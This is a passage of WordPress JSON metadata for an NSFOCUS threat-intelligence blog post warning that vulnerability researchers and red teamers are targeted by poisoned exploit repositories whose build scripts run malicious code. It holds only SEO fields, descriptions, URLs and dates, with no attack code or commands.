n\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/person\\\/fd9ab61c9c77a81bbd870f725cc0c61d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/nsfocusglobal.com\"],\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS","description":"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.","robots":{"index":"noindex","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"pt_BR","og_type":"article","og_title":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS","og_description":"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.","og_url":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/","og_site_name":"NSFOCUS","article_published_time":"2023-07-05T06:30:31+00:00","article_modified_time":"2026-04-17T18:07:40+00:00","og_image":[{"url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_title":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS","twitter_description":"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.","twitter_image":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#article","isPartOf":{"@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/"},"author":{"name":"admin","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/person\/fd9ab61c9c77a81bbd870f725cc0c61d"},"headline":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack","datePublished":"2023-07-05T06:30:31+00:00","dateModified":"2026-04-17T18:07:40+00:00","mainEntityOfPage":{"@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/"},"wordCount":724,"commentCount":0,"publisher":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization"},"image":{"@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png","keywords":["threat intelligence"],"articleSection":["Blog"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/","url":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/","name":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack - NSFOCUS","isPartOf":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#primaryimage"},"image":{"@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png","datePublished":"2023-07-05T06:30:31+00:00","dateModified":"2026-04-17T18:07:40+00:00","description":"NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.","breadcrumb":{"@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#primaryimage","url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png","contentUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/07\/feature-image.png","width":441,"height":267,"caption":"Magnifying glass over red digital bug."},{"@type":"BreadcrumbList","@id":"https:\/\/nsfocusglobal.com\/alert-vulnerability-researchers-and-red-team-members-targeted-in-watering-hole-attack\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nsfocusglobal.com\/"},{"@type":"ListItem","position":2,"name":"Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack"}]},{"@type":"WebSite","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#website","url":"https:\/\/nsfocusglobal.com\/pt-br\/","name":"NSFOCUS","description":"Security Made Smart and Simple","publisher":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nsfocusglobal.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization","name":"NSFOCUS","url":"https:\/\/nsfocusglobal.com\/pt-br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/logo\/image\/","url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2024\/08\/logo-ns.png","contentUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2024\/08\/logo-ns.png","width":248,"height":36,"caption":"NSFOCUS"},"image":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/person\/fd9ab61c9c77a81bbd870f725cc0c61d","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/nsfocusglobal.com"],"url":"https:\/\/nsfocusglobal.com\/pt-br\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts\/25088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/comments?post=25088"}],"version-history":[{"count":0,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts\/25088\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/media\/25111"}],"wp:attachment":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/media?parent=25088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/categories?post=25088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/tags?post=25088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}